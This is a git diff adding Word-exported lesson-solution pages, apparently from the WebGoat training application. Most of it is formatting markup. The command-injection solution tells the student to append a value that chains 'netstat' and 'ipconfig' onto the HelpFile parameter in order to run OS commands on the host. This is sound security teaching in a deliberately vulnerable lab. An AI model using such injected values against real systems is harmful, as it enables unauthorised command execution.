+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Perform Command Injection <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach: </span></b><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Command
+injection attacks represent a serious threat to any parameter-driven site. The methods
+behind an attack are easy to learn and the damage caused can range from
+considerable to complete system compromise. Despite these risks an incredible
+number of systems on the internet are susceptible to this form of attack. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Not only is
+it a threat easily instigated, it is also a threat that, with a little
+common-sense and forethought, can be almost totally prevented. This lesson will
+show the student several examples of parameter injection.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>It is always
+good practice to sanitize all input data, especially data that will used in OS
+command, scripts, and database queries.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to execute any command on the hosting OS.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1375" o:spid="_x0000_i1028" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1375"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 16<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Select a
+lesson from the drop-down box and click on “View”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1376" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1376"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
+request with WebScarab when you click on “View”. Append “ &amp; netstat –an
+&amp; ipconfig to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1377"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=613 height=483
+src="/WebGoat/lesson_solutions/CommandInjection_files/image008.jpg" v:shapes="Picture_x0020_1377"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Injecting command netstat &amp; ipconfig</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The result
+contains the output of the command netstat and ipconfig.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1378"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/CommandInjection_files/image009.jpg" v:shapes="Picture_x0020_1378"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Command Injection results<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/CommandInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/CommandInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/CommandInjection_files/filelist.xml
new file mode 100644
index 000000000..c778dd663
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/CommandInjection_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../CommandInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image007.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/image001.png b/main/project/WebContent/lesson_solutions/CommandInjection_files/image001.png
new file mode 100644
index 000000000..95185ac08
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CommandInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/image003.png b/main/project/WebContent/lesson_solutions/CommandInjection_files/image003.png
new file mode 100644
index 000000000..bb6e1e518
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CommandInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/image005.png b/main/project/WebContent/lesson_solutions/CommandInjection_files/image005.png
new file mode 100644
index 000000000..9c7ecd242
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CommandInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/image007.jpg b/main/project/WebContent/lesson_solutions/CommandInjection_files/image007.jpg
new file mode 100644
index 000000000..d82452e33
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CommandInjection_files/image007.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/image008.jpg b/main/project/WebContent/lesson_solutions/CommandInjection_files/image008.jpg
new file mode 100644
index 000000000..67162e723
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CommandInjection_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/image009.jpg b/main/project/WebContent/lesson_solutions/CommandInjection_files/image009.jpg
new file mode 100644
index 000000000..916c6fdc1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CommandInjection_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/CommandInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/CommandInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/CommandInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection.html b/main/project/WebContent/lesson_solutions/DOMInjection.html
new file mode 100644
index 000000000..a85e47911
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/DOMInjection.html
@@ -0,0 +1,865 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/DOMInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/DOMInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>45</o:TotalTime>
+  <o:Created>2007-07-11T14:49:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:20:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>345</o:Words>
+  <o:Characters>1972</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>16</o:Lines>
+  <o:Paragraphs>4</o:Paragraphs>
+  <o:CharactersWithSpaces>2313</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/DOMInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/DOMInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
